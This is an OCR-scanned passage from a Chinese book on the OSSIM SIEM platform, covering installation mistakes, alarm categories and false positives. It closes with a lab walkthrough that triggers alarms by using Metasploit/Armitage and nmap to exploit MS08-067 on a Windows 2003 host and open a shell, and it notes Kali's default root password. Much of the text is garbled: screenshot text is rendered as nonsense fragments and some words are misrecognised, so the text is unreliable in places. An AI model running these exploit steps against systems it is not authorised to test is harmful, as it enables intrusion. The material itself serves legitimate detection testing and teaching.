AlienVault 状况 的 右 下 角 “VIEW TREND” 中 查看 。 


OPEN TICKETS 1 


UNRESOLVED ALARMS 


My Company 
My Company Metrics 


SYSTEM HEALTH 
1/1 SENSORS ACTIVE 


LATEST SIEM ACTIVITY 1,268 EPS 


MONITORED DEVICES 6 


Ers Tikt TD 


图 2-129 每 秒 事件 数量 EPS 


就 国内 SIEM 产品 而 言 ， 没 有 统一 标准 ， 目 前 还 处 于 各 自 为 战 的 状态 。SIEM 系统 每 天 存 
储 几 百 万 事件 ， 而 发 现 的 真实 故障 问题 可 能 也 就 几 个 ， 从 用 户 角 度 理解 希望 EPS 越 大 ， 证 明 
系统 处 理 能 力 越 强 , 但 从 问题 的 发 生 一 传输 一 接收 一 归 一 化 处 理 一 关联 分 析 一 告警 一 入 库 这 个 
流程 上 看 ，EPS 越 大 系统 (包括 CPU, Disk) 承载 的 负荷 就 越 大 ， 所 以 用 户 在 使 用 OSSIM 这 
样 的 SIEM 产品 时 ，EPS 的 大 小 可 能 每 个 用 户 都 不 同 ， 这 取决 于 系统 架构 ， 特 别 是 数据 库 以 及 
消息 处 理 系统 的 配置 。 

还 有 一 点 需要 明白 ，EPS 代表 了 服务 器 中 被 分 析 处 理 的 事件 数量 ， 而 不 是 通过 syslog 接 
收 日 志 的 数量 。EPS 变化 趋 式 在 OSSIM USM Server 端 ， 在 sensor 端 无 数据 。 


2.16.17 常见 OSSIM 安装 /使 用 错误 
下 面 笔者 列举 了 一 些 常 见 的 OSSIM 安装 错误 ， 以 便 大 家 在 今后 安装 中 少 走 弯路 。 
(1) OSSIM Server 以 及 Sensor 的 非法 关机 。 
禁止 OSSIM Server 以 及 Sensor 的 非法 关机 ， 这 将 有 可 能 造成 数据 库 损坏 。 图 2-130 列举 
某 一 OSSIM 系统 在 非法 关机 后 , 重 开机 的 画面 ， 左 边 为 启动 系统 画面 , 但 长 期 停留 在 此 画面 ， 
但 按 F2 键 进入 命令 行 界面 后 发 现 右 边 的 提示 ， 这 就 是 非法 关机 后 果 ， 最 后 进入 OSSIM 单 用 
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户 模式 使 用 fsck 几经 周折 修复 文件 系统 后 才 恢 复 系 统 。 


ev] 


ALIEN VAULT 


图 2-130 ”非法 关机 后 的 启动 界面 
(2) 禁止 在 硬件 配置 较 低 的 机 器 上 运行 OSSIM 系统 。 
前 面 也 谈 到 过 OSSIM 内 存 消耗 问题 ， 但 大 家 在 测试 中 还 很 可 能 在 2GB 或 者 4GB 内 存 的 
旧 服 务 器 上 安装 OSSIM 4 的 64 位 版 本 ,这 种 配置 肯定 没 法 使 用 。 笔者 在 大 量 实践 经 验 的 基础 


上 总 结 得 出 ， 至 少 16GB 内 存 的 服务 器 ， 系 统 才 能 稳定 运行 。 如 果 读 者 在 实验 时 ， 没 有 大 内 存 
的 机 器 ， 那 么 只 能 选择 低 版 本 的 32 位 OSSIM 系统 。 例 如 2GB~4GB 内 存 的 单 CPU 服务 器 能 
够 安装 OSSIM 2.3 版 。 

(3) OSSIM 流量 收集 分 析 口 在 交换 机 上 没有 正确 设置 SPAN. 

这 种 也 属于 初学 者 常见 的 问题 之 一 ， 在 使 用 OSSIM 做 IDS 分 析 时 ， 一 定 要 将 所 检测 网 段 
的 全 部 流量 镜像 过 来 ， 方 法 之 一 是 采用 SPAN。 当 然 对 于 流量 很 大 的 情况 ， 可 以 采用 网 络 分 流 
器 (NetTAP) 这 种 硬件 卡 实现 分 流 目 的 。 

(4) 安装 时 仅 安 装 了 Sensor 组 件 。 

初学 者 在 初次 安装 OSSIM 系统 时 只 安装 了 Sensor， 导 致 无 法 使 用 。 


(5) OSSIM 装 好 了 系统 ， 长 期 置之不理 。 
OSSIM 虽然 是 一 套 智 能 分 析 系 统 ， 但 也 需要 每 天 对 其 进行 必要 的 维护 ， 建 议 指 定 专门 的 
网 络 安全 分 析 师 ， 经 常 观察 OSSIM 搜集 的 情报 ， 以 便 及 时 进行 调整 。 
(6) 错误 选用 SELinux 安装 。 
SELinux 全 称 是 Security Enhanced Linux， 它 目的 在 于 明确 指明 某 个 进程 可 以 访问 哪些 资 
源 (包括 文件 网 络 端口 等 有 些 朋 友 考 虑 加 固 OSSIM 系统 因为 系统 默认 没有 启用 SELinux 
所 以 想 手工 安装 SELinux。 
#apt-get install selinux-basics 
#apt-get install selinux-utils 


#apt-get install setools 
#selinux-activate 
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从 安全 角度 考虑 ， 这 种 想法 没有 错 ， 但 是 Alienvault 公司 并 没有 为 OSSIM 组 件 做 这 方面 
的 设置 ， 冒 然 启用 了 SELinux， 后 果 很 严重 。SeLinux 不 但 改变 了 文件 权限 ， 而 且 还 禁止 了 so 
库 的 调用 ， 所 以 整个 OSSIM 系统 无 法 启动 。 


(7) Server 和 Sensor 的 角色 能 通过 软件 添加 删除 而 互 换 ? 

不 能 ， 除 了 重 装 没有 其 他 方法 。 

(8) 启用 过 多 插件 。 

对 于 新 手 常常 喜欢 将 一 些 自己 认识 的 插件 全 加 载 到 系统 中 〈 尤 其 是 混合 式 安装 的 OSSIM 
要 承担 更 多 压力 )， 要 知道 插件 内 主要 是 正则 表达 式 ， 当 它 在 处 理事 件 时 是 要 消耗 内 存 、 人 磁盘 
空间 和 CPU 等 资源 ， 加 载 越 多 消耗 越 大 。 当 Sensor 将 事件 归 一 化 处 理 完 之 后 ， 还 需 传 给 后 续 
关联 引擎 多 次 分 析 ， 这 样 进一步 加 大 系统 负载 ， 所 以 并 不 是 添加 越 多 越 好 。 


(9) AETH OSSIM 当成 煲 垒 机 使 用 ? 

不 能 。 

(10) OSSIM 错误 部 署 方式 。 

不 要 用 OSSIM 系统 收集 负载 均衡 服务 器 日 志 。 每 台 负 载 均 衡 服务 器 每 天 会 产生 数 百 GB 
的 访问 日 志 ， 全 网 负载 均衡 服务 器 的 日 志 量 几 十 TB， 即 使 是 通过 Gzip 压缩 也 有 3~4TB， 这 
么 大 的 负载 会 将 OSSIM ALIS. 

(11) 反复 调整 系统 的 时 间 / 时 区 。 

- 定 要 设置 好 时 区 、 时 间 ， 一 旦 调整 好 ， 系 统 运行 一 定 阶段 后 ， 禁 止 再 修改 这 个 时 间 。 否 
则 SIEM、 日 志 会 发 生 故 障 。 


可 视 化 网 络 攻 击 报警 Alarm 分 析 


在 Syslog 的 日 志 级 别 中 定义 了 一 种 叫做 Alert (警报 ) 的 日 志 ， 出 现 Alert 意味 着 须 马上 
采取 行动 的 事件 。 本 节 开 始 为 大 家 介绍 Alarm 及 其 分 析 的 技术 。 在 OSSIM 系统 中 ，Alarm 的 
各 种 提示 应 该 是 安全 分 析 师 调查 事件 的 关键 点 。 

在 OSSIM 的 Web UI 界面 中 ， 图 形 化 Alarm 报警 由 关联 指令 经 关联 分 析 引 擎 而 生成 ， 根 
源 来 源 于 Snort 和 Ossec 等 数据 源 的 报警 。 长 期 安全 事件 分 析 中 发 现 ， 绝 大 多 数 安全 事件 元 余 
出 自 同 源 、 同 类 型 、 同 目的 的 安全 事件 ， 同 类 型 、 同 目的 的 安全 事件 或 同类 型 、 同 源 的 安全 事 
件 所 占 比 例 更 大 ， 但 在 Alarm 可 以 通过 实时 聚合 算法 来 实现 去 除 见 余 ， 将 多 条 安全 事件 聚合 
生成 一 条 新 的 报警 。 此 时 读者 可 能 想到 安全 事件 聚合 后 输出 到 哪儿 ? 下 一 个 环节 就 是 关联 分 
析 ， 比 如 根据 交叉 关联 、 序 列 关联 来 分 析 聚 合 后 的 事件 ， 这 样 效率 就 比分 析 原始 日 志高 得 多 ， 
还 能 避免 IDS 带 来 的 误 报 。 
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2.47.1. 报警 事件 的 产生 

报警 事件 (Alarm Events). 由 关联 指令 (Correlation Directives) 所 产生 ， 在 Alarm 中 展示 
的 警告 信息 是 通过 关联 规则 从 大 量 的 事件 中 匹配 而 得 出 。 在 OSSIM 4.6 以 后 的 系统 ， 采 用 了 
一 种 图 形 化 展示 OSSIM 系统 Alarm 报警 的 模式 ， 这 便于 管理 员 从 大 量 安全 事件 中 筛选 最 重要 
的 部 分 。Alarm 事件 产生 过 程 如 图 2-131 所 示 。 


a. 送 入 关联 引擎 关联 分 析 引擎 
pon UC 
is Pa 
AA 
< 学 b. 送 入 SIEM 
ip 事件 | 
了 | EE E | «Evenb | | Et | 
Alarm 
图 2-131 Alarm 事件 产生 过 程 
Alarm 生成 步骤 : 


(1) 日 志 收集 到 OSSIM: 

(20 将 日 志 统一 进行 归 一 化 处 理 后 生成 事件 ; 
G) 将 这 些 事 件 导入 关联 引擎 

(4) 根据 关联 规则 匹配 出 新 的 事件 。 


2.7.2 ”报警 事件 分 类 

在 OSSIM 的 图 形 化 报警 显示 中 ， 由 关联 引擎 处 理 后 ， 生 成 的 报警 分 为 5 种 类 型 ， 产 生 图 
形 化 报警 会 比 SIEM 控制 台 里 的 安全 事件 有 些 延 时 。 这 几 种 类 型 的 报警 ， 读 者 可 以 到 Threat 
Intelligence 一 Directives 下 查看 关联 指令 ， 每 种 关联 指令 的 下 方 都 会 标记 指令 对 应 的 报警 分 类 ， 
总 结 如 下 : 

E S System Compromise: 代表 系统 损害 或 破坏 . 图 标 采 用 感染 性 化 学 标记 ， 


对 应 策略 文件 为 alienvault-scan.xml 等 。 下 面 为 该 策略 典型 实例 : 
pv DDoS bot Darkness detected on SRC_IP 
-s Tolan infection, DDoS trojan Darkness 


e. O Exploitation & Installation: 代表 漏洞 利用 与 安装 。 采 用 警 铃 图 标 表 示 对 应 
Exploitation & 
Installation 


策略 文件 为 malware.xml 等 。 下 面 为 该 策略 典型 实例 : 
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Pv AV Web attack, SQLNinja successful attack against DST. IP 
Ls Exploitation & Installation| WebServer Attack - SQL Injection, SQLNinja 


. Q Delivery & Attack: 代表 攻击 。 采 用 瞄准 镜 图 标 表示 对 应 策略 文件 为 


Delivery & Attack 


alienvault-bruteforce.xml alienvault-attack 等 。 下面 为 该 策略 典型 实例 : 


Pv AV-FREE-FEED Web attack, SQL injection attacks detected against DST. IP 
Ls Delivery & Attack] WebServer Attack - SQL Injection, Attack Pattern Detection 


e. Reconnaissance & Probing: 代表 侦查 与 探测 。 采 用 雷达 扫描 图 标 表示 对 


Reconnaissance & 
Probing 


应 策略 文件 为 alienvault-scan.xml 等 。 下 面 为 该 策略 典型 实例 : 
n, SSH service lacaya activity from SRC_IP 
b vU Rc Pb seice discovery, SH o 7 oY 


@ Environmental Awareness: 代表 环境 意识 。 对 应 策略 文件 为 
Environmental 
Awareness 


alienvault-policy.xml 等 。 下面 为 该 策略 典型 实例 : 


bv ation, BitTorrent P2P usage on SRC. IP 
-多 Env üronmental War eness Desktop Software - P2P, BitTorrent 


这 五 类 报警 在 Web UI 中 显示 在 同一 张 图 中 ， 通 过 菜单 Analysis Alarm 查看 ， 如 图 2-132 
所 示 。 从 图 中 看 出 圆圈 面积 大 小 ， 直 观 地 反映 了 某 类 事件 数量 的 多 少 。 


Usrvew 


2-132 Alarm 种 类 
1. System Compromise 


此 类 报警 属于 系统 危害 类 安全 事件 ,出 现 此 类 报警 说 明 攻 击 者 已 通过 网 络 或 其 他 技术 手段 
造成 系统 中 信息 被 算 改 、 信 息 泄露 与 被 窃取 (未 授权 用 户 获取 信息 )。 例如 当 系 统 感染 蠕虫 后 ， 
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会 对 系统 造成 不 同 程度 的 损害 , 在 图 2-133 中 显示 了 感染 蠕虫 时 系统 损害 实例 。 它 的 模式 是 从 
源 地 址 发 往 目 的 地 址 , 系统 给 出 了 原 地 址 和 目的 地 址 。 这 类 报警 放 在 首位 , 说 明 它 是 最 重要 的 ， 
最 引 人 警 觉 的 报警 ， 往 往 这 类 报警 的 风险 大 于 3( 属 于 高 风险 事件 )， 大 家 应 该 首先 关注 这 类 
报警 。 

ALARMS. o 


LIST VIEW 


ue 
o5 05 o 
Ek+ 
1 
"c STNATION 
j ^ veni " seisean 。 国 1221255817zhap 
) 24:004 open Agh Tomninfeaon cea " 一 68 2707 mm 14881.111.121:65520 
] mews — opm — Agh Toan ifecton Ll à c» 6055 em — 国 


图 2-133 系统 损害 实例 
对 于 隐藏 性 非常 强 的 C&C 攻击 ， 通 过 这 里 的 报警 同样 能 显示 出 来 ， 如 图 2-134 所 示 。 


m 


EK. 99: 9o: 090 OO E 


O osassa — on Agh Chc Communiauon anthole -Abuse ch 2 .-— ndows2260111 messen H 


A SYSTEM COMPROMISE: C&C COMMUNICATION e. | 5O O 1 1. NE 
ATTACK PATTERN NAL TO EXTERN 


2-134 C&C 攻击 危害 检测 


在 事件 特征 码 中 ， 单 击 右键 可 以 看 到 “Logs by Signature” 等 3 个 按钮 ， 在 原 地 址 处 单 击 
右键 会 显示 Asset Detail 等 14 个 和 这 条 事件 相关 的 功能 菜单 ， 大 家 可 以 自己 逐个 尝试 。 如 图 
2-135 所 示 。 
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Alarms . AV Bruteforce attack, SSH authentication attack against. 


O Ó Br e 
© 中 Bruteforce Authentication — SSH 8 128 3 m z2 ^ 
Open Events. Risk >2 mins — 
SOURCE DESTINATION KNOWLEDGE BASE 知识 库 
其 203.251.30.181 10.200.59.77 Alienault Incident Response: Alarm / Broteforce. 
" a paa A possible BruteForce Fas been detected via correlating eventa seen on the 
3 Location: South Korea $ Location: unimos e force anempts are one o the few TAINGS in securty DELATE 
: See their volume, oe enope Me a system Eaa be capletee 
dor No d oT No wh as itte ag e mgle pachet of dea rut Tore ul requies Breat 
S presents a prohlen in determining the validity of a brute-force at 
Wirors. 34140:548563536]:39335. 里 rors ssh SO re Broken Se Ohe synen roe EVA ta 199 
40539 49940 50429 52949 Ringe wetem vyng moustrdr Safe accounts and passvords, 
56230 58610 Net brute torce atfen pts wil be axour account crecentals, any attempt 


gen access to something through trial and error repettion isa brute force 


EVENT DETAIL. UR STINATIO! a 


7 Configure Asset 


CORRELATION 
E ALARM RSK DATE Soui æ Tickets naar 


? snort: "ET SCAN LIDSSH Based Fr o 2015-04-04 10:4542 * 203251.5 B s £ 5 
E Security Event 


Š Related Security Events 


2 sort: "ET SCAN USSH Based Fre Lor Signature ü o US0EDATDASA 0092092572. welated security Firewall vents. d 
38 Vulnerabilities. 

3 sort: "ET SCAN LIoSSH Based Frequent SSH Connections Likely BruteForce Attack!" O — 2015004104542 s; 2082513 加 Net profile 5 
gm Trafic 

4 snort "ET SCAN LioSSH Based Frequent SSH Connections Likely BruteForce Attacer o — 20150H04104542 ist 2012513 i) Related Traffic B 
司 Availability 


图 2-135 SSH 暴力 破解 时 Snort 报警 
2. Exploitation&lnstallation 
第 二 类 重要 的 告警 为 exploit 〈 漏 洞 利 用 程序 )， 它 属于 恶意 代码 类 安全 事件 ， 攻 击 者 蓄意 
制造 、 传 播 恶 意 代码 ， 包 括 木 马 、 网 页 挂 马 、 跨 站 脚本 XSS 和 僵尸 软件 ， 这 通常 意味 着 攻击 


者 进行 了 渗透 、 提 权 等 严重 的 攻击 事件 。 在 图 2-136 中 的 告警 表示 Web 服务 器 遭受 了 XSS 攻 
击 。 


ALARMS. o 
USTVIEW croup view 

Al Alarms > Explo msiallavon (2014-10-05 00h — 20141005 03n) NANE refresh in 263 seconds, 

P SEARCH AND FILTER ue 


31 pavs 1410-05 14-10-26 14-10-07 14-10-08 14-10-09 14-10-10 141031 


EM. e $ 


nstallatlon 6K+ 


sow (573) EN 


- 
we = sume o menta saeor base ameona soue 。 simone : 
e 
D meae open (yeso x ， ES miam o cma 
o muaem coen (yes E ， 一 mnano asas 


2-136 XSS 攻击 告警 
3. Delivery&Attack 
Delivery 和 Attack 报警 表示 正在 发 生 攻 击 行为 ,这 属于 入 侵 、 攻 击 类 安全 事件 ， 它 利用 系 


统 配置 缺陷 、 协 议 缺 陷 、 程 序 缺 陷 ， 使 用 暴力 攻击 等 手段 对 信息 系统 实施 攻击 ， 包括 Dos、 猜 
测 口令 、 域 名 劫持 、SQL 注入 等 。 如 图 2-137 所 示 ， 表 示 系 统 捕获 的 暴力 破解 事件 。 
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ALARMS o 
USTVEW — GROUP VIEW 
Next refresh in 284 second 
PSAN wG 
31DAYS on 14-10-04 14-10-05 14-10-05 14-1007 141508 41-08 -1010 
.. [o 
Delivery à Attack E 
Gk 
-e 
3 £j i 
D wenn TACK PATTE sour  & DESTINATION ° 
20141004 E 1 一 ozeanoa 1921681110ssh 
zei004 — open -ona ior s" 1 一 时 1921598205333 1521681110%ssh 
20141004 opon -C aruteforeAuthencation P 1 ES 192169.1.91333 o i9216811005h P: 


图 2-137 检测 到 攻击 者 对 SSH 服务 进行 暴力 破解 
4. Reconnaissance&Probing 


这 属于 扫描 探测 类 安全 事件 , 它 是 用 嗅 探 或 模拟 业务 通信 的 方式 获得 系统 及 网 络 信息 的 各 
类 事件 ， 如 目标 存活 信息 、 端 口服 务 开放 信息 、 操 作 系 统 指纹 等 。 对 入 侵 攻击 来 说 ， 扫 描 探测 
是 信息 收集 的 主要 手段 , 所 以 通过 对 各 种 扫描 原理 进行 分 析 后 , 我 们 可 以 找到 在 攻击 发 生 时 数 


据 流 所 具有 的 特征 ， 而 OSSIM 的 告警 功能 可 以 发 现 这 种 异常 行为 ， 图 2-138 展示 了 端口 扫描 
(还 包括 系统 服务 扫描 和 通信 协议 扫描 ) 行为 。 


ALARMS 


LSTMEW GROUP VIEW 


31 DAYS 


ue 


moa wen rosan 


图 2-138 ”检测 到 端口 扫描 
5. Environmental Awareness 


这 类 行为 的 告警 优先 级 最 低 , 通常 是 软件 升级 或 者 电驴 BT 等 P2P 类 下 载 的 报警 , 包含 易 
受 攻 击 的 软件 和 可 疑 的 通信 , 其 Risk 值 一般 科 1, 如 图 2-139 所 示 。 这 种 报警 有 时 却 不 容 忽视 ， 


例如 当 某 一 台 服 务 器 , 未 经 自己 操作 ， 然 后 在 这 里 出 现 了 升级 的 痕迹 ,那么 管理 员 也 应 查 明 到 
底 是 你 同事 操作 过 ， 还 是 黑客 已 经 接管 了 服务 器 。 
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DATE © STATUS © INTENT&STRATEGY 9 METHOD 3 wc ATTACK PATTERN SOURCE S  DESTWATON 


10:44:52 open QD esmo sotware. Pz eDonkey 1 一 192.168.11.11912409 — il 221.215.133.8912428 E] 


图 2-139 检测 到 P2P 下 载 


2.47.3 ”五 类 报警 数据 包 样 本 下 载 

OSSIM 将 报警 类 型 分 为 上 一 小 节 所 说 的 五 种 类 型 ， 大 家 在 工作 中 或 实验 中 ， 一 般 不 会 全 
部 测试 出 效果 ， 也 就 是 说 ， 有 些 报警 可 能 短 时 间 出 现 ,为 了 方便 大 家 实验 ,这 里 给 出 了 一 个 方 
便 快 捷 且 无 害 的 方式 ， 即 通过 下 载 特殊 的 封包 的 方式 实现 快速 报警 ， 这 些 封包 通过 密 钢 抓 取 ， 
经 特殊 处 理 之 后 ， 保 存 为 .pcap 格式 。 大 家 只 需 下 载 这 些 数 据 包 ， 然 后 在 Sensor 所 监控 的 网 段 
重 放 ， 即 可 立即 获得 报警 。 下 载 地 址 为 http://chenguang.blog.51cto.com/ 。 


2.47.4 ”报警 分 组 
在 Alarm 下 的 告警 列表 中 ， 还 提供 了 另 一 种 简明 扼要 的 方式 展现 告警 。 大 家 可 以 尝试 单 
击 Group View， 告 警 分 组 ， 如 图 2-140 所 示 ， 可 以 将 告警 分 类 显示 出 来 。 


ALARMS o 
ustvew Group view 
SEARCH AND FLTER 
pupeo sv (Ami rame D 
* coue OWNER — HIGHESTRIK DEscAIPnON Srus acmon, 
B 
L4 
Tau 1 ] j 
ER t um 
. w o * 


* Orsop Softvare- PaP — eDonkey 66. 


2-140 告警 分 组 显示 


这 种 分 类 的 好 处 是 只 显示 出 有 效 告警 。 若 想 在 分 组 中 查看 某 一 分 组 中 某 类 告警 的 详细 信 
息 ， 只 要 单 击 对 应 事件 即 可 ， 如 图 2-141 所 示 。 
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ALARMS o 
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2-141 感染 蠕虫 的 告警 


下 面 仅 以 System Compromise 一 Worm Infection — Internal Host scanning 告警 为 例 ， 在 系统 危 
害 中 出 现 了 内 部 主机 的 扫描 行为 ， 这 类 行为 疑似 为 网 络 蠕虫 的 扫描 ， 扫 描 主机 漏洞 往往 是 蠕虫 传 
播 的 前 提 ， 蠕 虫 通过 ICMP 包 、TCP SYN, FIN, RST 以 及 ACK 包 探测 ， 且 具有 随机 性 。 从 图 
2-142 中 看 出 ， 系 统 定义 出 这 类 事件 的 风险 值 、 扫 描 的 持续 时 间 、 源 地 址 、 目 的 地 址 、 源 端口 、 目 
标 端口 以 及 关联 等 级 ， 这 种 异常 行为 会 立即 被 OSSIM 发 现 。 告 警 截图 如 图 2-142 所 示 。 


ALARM DETAIL 


AÈ Worm infection — Internal Host scanning 


192.168.11.200 46 IPs 
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图 2-142 查看 告警 事件 详情 


185 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


从 整体 上 发 现 某 段 时 间 内 发 生 了 多 少 种 告警 还 不 够 , 还 需 掌握 告警 的 具体 信息 以 及 它 的 发 
展 趋 势 、 时 间 、 背 景 知识 库 等 信息 ， 这 些 为 我 们 诊断 故障 提供 了 重要 依据 。 


2.47.5 “识别 告警 真 伪 

谈 到 真 、 假 告警 的 问题 ， 就 如 同 医院 中 病毒 检测 一 样 ， 因 此 ，OSSIM 的 IDS 系统 数据 经 
过 关联 分 析 引擎 检测 会 得 出 一 个 报告 ,那么 我 们 不 能 完全 按 这 个 报告 去 判断 , 如 果 把 正常 的 资 
源 访问 判断 为 入 侵 行为 并 加 以 告警 ， 就 是 “ 误 报 (False Positive)”。 如 果 没 有 发 现 某 个 入 侵 行 
为 ， 没 有 对 其 进行 响应 ， 就 是 “ 漏 报 (False Negative)". 

安全 策略 定义 得 过 于 严格 ,就 容易 产生 “ 误 报 ”。 例如 某 些 只 会 针对 Windows 攻击 才 会 成 
功 的 攻击 ， 如 果 它 的 目标 节点 系统 为 Linux， 显 然 不 能 成 功 。 某 些 只 能 针对 Windows 低 版 本 才 
能 成 功 的 攻击 ， 如 果 目 标 节 点 为 Window8/10 系统 ， 这 种 攻击 也 不 能 成 功 。 对 于 这 类 事件 ， 同 
样 会 产生 安全 报警 ， 但 不 具有 和 危害， 系统 会 自动 标记 为 误 报 。 

安全 策略 如 果 定义 得 过 于 宽松 ， 就 容易 产生 “ 漏 报 ”。 与 误 报 相 比 ， 漏 报 其 实 更 危险 。IDS 
想 要 防止 欺骗 ， 就 要 尽 可 能 地 模仿 TCP/IP 栈 的 实现 。 但 是 从 效率 和 实现 的 复杂 性 考虑 ，IDS 
并 不 能 做 到 这 一 点 。IDS 的 实现 总 是 在 漏 报 和 误 报 中 徘徊 ， 漏 报 率 降 低 了 ， 误 报 率 就 会 提高 ， 
反之 亦 然 。 

网 络 中 不 断 有 新 的 威胁 产生 ， 在 Web UI 中 Analysis 一 Alarm 菜单 可 以 将 所 有 告警 进行 聚 
合并 分 类 ， 同 时 允许 管理 员 将 聚合 后 的 告警 进行 标识 ， 如 图 2-143 所 示 ， 选 择 “Vulerable 
software", 在 右 下 角 会 出 现 “APPLY LABLE” 标 签 , 弹出 两 个 选项 分 别 是 “Analysis in Progress 
(分 析 进 展 情况 )”， 用 红色 字体 醒目 标 出 , 含义 是 继续 分 析 该 报警 。 另 一 种 是 “False Positive" 
表示 误 报 系统 ， 用 蓝 色 字体 醒目 标 出 ， 表 示 可 忽略 的 报警 ， 如 图 2-143 所 示 。 


rep 
VIEW DETAILS 
CLOSE 


图 2-143 告警 标识 


2.17.6 触发 OSSIM 报警 
当 使 用 扫描 器 或 渗透 工具 对 OSSIM Sensor 所 监控 网 段 的 主机 进行 扫描 和 渗透 ，SIEM 控 


186 


制 台 会 发 出 事件 报警 。 对 于 扫描 工具 ， 大 家 可 以 采用 BTS 光盘 中 的 工具 (最 新 版 本 为 
Kali-Linux)， 例 如 nmap, Autoscan, fping3 等 ， 渗 透 工具 可 采用 Metasploit。 
BT5 系统 中 集成 了 V4 版 本 的 Metasploit 渗透 测试 框架 ， 在 Terminal 上 执行 msfconsole 
命令 就 可 以 直接 进入 Metasploit 的 命令 行 界面 BTS 系统 中 集成 的 Metasploit 渗透 测试 框架 
不 是 最 新 版 本 , 使 用 前 首先 进行 更 新 。 在 Terminal 中 通过 执行 “msfupdate” 命 令 对 Metasploit 
渗透 测试 框架 进行 更 新 ， 如 图 2-144 所 示 ， 更 新 之 后 便 可 以 体验 最 新 版 本 的 Metasploit。 


work 54.1 MB/55.9 MB 9; 33 s 2lmin 13g| 


图 2-144 "mmm 
我 们 在 Kali 下 启动 Metasploit 图 形 界面 ，Armitage 是 一 款 用 Java di 
界面 工具 ， 可 用 来 针对 存在 的 漏洞 进行 自动 化 测试 G 
先 启动 两 个 重 


引 的 Metasploit 图 形 
GE BT5、Kali Linux 下 已 集成 )。 首 
要 的 服务 分 别 是 MySQL 和 Metasploit RPC， 操 作 菜 单位 于 : 


€ Applications ^ Kali Linux ^ System Services 一 Mysql 一 mysql start 


© Applications > Kali Linux > System Services > Metasploit ^ community /pro start 


然后 在 Terminal 中 输入 armitage 命令 ， 弹 出 登录 界面 ， 显 示 的 主机 名 、 端 口 、 用 户 及 密 
码 都 保持 默认 值 ， 接 着 单 击 Connect 按钮 ， 但 系统 显示 没有 发 现 RPC 服务 器 ， 这 时 需要 选择 
Metasploit 的 RPC 服务 器 ， 选 择 Yes 按钮 ， 稍 过 一 会 儿 ， 系 统 便 会 启动 Msf 的 图 形 化 界面 。 
如 图 2-145 所 示 。 


Applications Places 地 园 Sat Jan 3, 9:38 Al 


test 


Connect | Help 


到 


2-145 ”启动 armitage 
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接着 在 菜单 项 中 选择 exploits 一 windows 一 smb 一 ms08_067_netapi， 将 显示 配置 渗透 攻击 
模块 参数 的 对 话 框 ， 如 图 2-146 所 示 。 


Applications Places 43] Sat Jan 3, 10:00 AM 


Jspoolss 
neticentiy stierrpepipe h 
psexec pah 
smb relay 
timbuktu plughnteomman 
smp 
"ies l 
» (i tenet 7 


图 2-146 查看 渗透 参数 


此 时 我 们 便 可 对 主机 进行 攻击 测试 , 假设 攻击 目标 IP 为 192.168.11.121 (一 台 安 装 英文 版 
的 Windows 2003 Server 系统 )， 首 先 对 目标 机 进行 端口 扫描 ，Armitage 集成 了 nmap TH, f 
ili Armitage 的 “Hosts” 菜 单 ， 利 用 “Nmap Scan” 这 种 快速 扫描 可 以 自动 探测 目标 主机 (或 
叫做 误 机 ) 的 操作 系统 ， 如 图 2-147 所 示 。 在 Armitage 攻击 系统 时 ， 准 确 探测 操作 系统 类 型 、 
版 本 比较 重要 S 


Input 


Enter scan range (e.g., 192.168.1.0/24): 
192.168.11.121| 


Cancel | | 0K | 


mm | 
图 2-147 选择 扫描 方式 和 对 象 


扫描 完结 束 后 ， 系 统 弹出 扫描 完成 对 话 框 ， 并 提示 选择 “Find Attacks”， 之 后 系统 开始 分 
析 ， 出 现 “Attack Analysis Complete” 提 示 后 查找 可 以 利用 的 exploit。 最 后 会 显示 nmap 的 扫 
描 结 果 ， 如 图 2-148 所 示 。 
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Gi mu 
i net 
@ osx 


ii lino 


Iti 


ware 


"篇 solaris 


Nnap 


nmap 
Star 
Nmap 
Host 
Not 
PORT 
135/ 
139/ 
445/ 
514/ 
1025 


o lnm 


| Message 


Attack Analysis Complete... 


€ You will now see an 'Attack' menu attached 


sole X[nmap X to each host in the Targets window. 


--min-hostgrd 
ting Nmap 6. Happy hunting! 
scan report 
is up (0,43: 
shown: 94 cld 
STATE SERVIC $ 
tcp open msrpc Microsoft Windows RPC 
tcp open netbios-ssn 
tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 
tcp filtered shell 
5/tcp open msrpc Microsoft Windows RPC 


图 2-148 分 析 目 标 主机 


此 时 我 们 选择 目标 系统 的 ms08_067 漏洞 ， 进 行 渗透 ， 如 图 2-149 所 示 。 


单 击 Exploit 


Attack 192.168.11.121 


a] Value 
192.168.139.155 
3180 

16811121 


nap 
Nmap 
Nmap 
Nmap 
Nmap 


Targets: |0 => Automatic Targeting - 
Use a reverse connecton 
Show advanced options 


Launch 


E 2-149 开始 渗透 目标 主机 


等 待 数秒 后 ， 提 示 溢 出 攻击 成 功 ， 目 标 主 机 图 标 变 成 了 带 闪电 的 红色 ， 
标 主机 图 标 上 单 击 右键 选择 Command Shell， 系 统 反 弹 一 个 Shell 表示 成 功 ， 如 图 2-150 所 示 


在 目 
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C; WINDOWS As ys tem32> 


图 2-150 ARY 


Se Kali Linux 系统 如 果 出 现 屏 幕 保护 ， 需 要 输入 root 的 密码 ， 默 认为 toor。 


下 面 再 看 看 控制 台 下 如 何 实 现 。 
这 里 实验 是 通过 OSSIM+Metasploit 联合 发 气 Windows XP 系统 的 Ms08-067 漏洞 , 过 程 如 
下 ， 以 BT5 系统 为 例 〈 其 他 版 本 同样 参照 其 执行 )， 启 动 MSF 终端 。 


#msfconsole 


1. 升级 系统 


#msfupdate 


升级 完成 后 ， 所 下 载 的 文件 存放 在 /opt/framework/msf3/ 目 录 下 。 有 时 候 在 升级 时 会 遇 到 错 
误 提 示 ， 例 如 : 

svn: GET of '/svn/!svn/ver/1609/framework3/trunk/lib/anemone/page.rb':could 
not connect to server (https://www.metasploit.com) 


这 时 ， 重 新 执行 “msfupdate” 即 可 ， 升 级 过 程 中 切 勿 强行 终止 升级 。 


2. Armitage 
输入 以 下 命令 ， 系 统 会 打开 一 个 图 形 化 界面 的 Metasploit。 
#armitage 


3. 添加 数据 库 服务 器 主机 IP 或 网 段 地 址 


添加 数据 库 服务 器 主机 IP 或 网 段 地 址 ， 输 入 :192.168.11.0/24。msfconsole〔 控 制 台 终端 ) 
是 Metasploit 渗透 测试 框架 中 的 用 户 界 面 , 在 终端 输入 命令 “msfconsole” 便 可 进入 控制 终端 。 
首先 利用 nmap 扫描 目标 主机 ， 并 发 现 MS08-067 漏洞 ， 如 图 2-151 所 示 。 
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Applications Places System DO 


žile Edit view Terminal Tabs Help 


